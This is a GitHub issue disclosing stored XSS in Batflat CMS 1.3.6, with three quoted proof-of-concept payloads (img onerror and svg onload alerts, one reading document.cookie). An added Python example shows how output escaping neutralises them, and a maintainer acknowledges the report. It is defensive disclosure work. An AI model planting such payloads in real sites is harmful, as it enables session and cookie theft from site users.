sruupl / batflat

Lightweight, fast and easy CMS for free. Bootstrap ready. https://batflat.org
MIT License

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 #105

Closed Tadjmen closed 2 years ago

Tadjmen commented 3 years ago

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Log in with an editor account that has rights to Navigation, Galleries and Snippets.

Navigation

Add link
payload: "><img src=x onerror=alert(document.cookie)>


Code being executed: [screenshot]

Galleries

Add gallery
payload: mlem"><svg/onload=alert(1)>


Code being executed: [screenshot]

Snippets

Add snippet
payload: mlem"><svg/onload=alert("TuongNC")>


Code being executed: [screenshot]
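All three payloads in the report share one shape: a leading `"` and `>` close the attribute the stored name is written into, and the rest opens a new element with an event handler. The added example below is not Batflat's code and does not reproduce its templates; it uses a hypothetical admin-panel template in which the stored name appears inside an attribute value and as element text, renders the three reported payloads through it with and without output encoding, and uses Python's HTML parser to list which elements and `on*` handlers the browser would actually create in each case.

```python
import html
from html.parser import HTMLParser

# Payloads quoted from the report above (constructed test input, not live data).
REPORTED_PAYLOADS = {
    "navigation_link": '"><img src=x onerror=alert(document.cookie)>',
    "gallery_name": 'mlem"><svg/onload=alert(1)>',
    "snippet_name": 'mlem"><svg/onload=alert("TuongNC")>',
}

# Hypothetical admin-panel template (not Batflat's): the stored name is written
# into an HTML attribute value and again as element text.
TEMPLATE = '<input type="text" name="name" value="{value}"><span>{value}</span>'


def render_vulnerable(value: str) -> str:
    """Interpolate the stored value verbatim, as a template without output encoding would."""
    return TEMPLATE.format(value=value)


def render_escaped(value: str) -> str:
    """Encode &, <, >, " and ' so the value can neither close the attribute nor open a tag."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


class _TagCollector(HTMLParser):
    """Record every start tag and every on* attribute the parser produces."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_elements(markup: str):
    """Return (unexpected tags, event-handler attribute names) found in rendered markup.

    Only the template's own <input> and <span> are expected; anything else came
    from the stored value.
    """
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    expected = {"input", "span"}
    return [t for t in parser.tags if t not in expected], parser.handlers


def check_all():
    """Compare the unescaped and escaped rendering for each reported payload."""
    results = {}
    for field, payload in REPORTED_PAYLOADS.items():
        results[field] = {
            "vulnerable": injected_elements(render_vulnerable(payload)),
            "escaped": injected_elements(render_escaped(payload)),
        }
    return results


if __name__ == "__main__":
    for field, outcome in check_all().items():
        print(field, "unescaped ->", outcome["vulnerable"], "| escaped ->", outcome["escaped"])
```

In the unescaped rendering each payload yields an injected `img` or `svg` element with an `onerror` or `onload` handler (twice, once per occurrence of the value in the template); in the escaped rendering the parser sees only the template's own `input` and `span`. Encoding must be applied at output time for every context the value is written into, since the same stored string is rendered in the attribute and in the element body here, and a fix that sanitizes only one of them leaves the other exploitable.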

michu2k commented 2 years ago

Thanks for reporting the problem! Fixes will be available in the next update.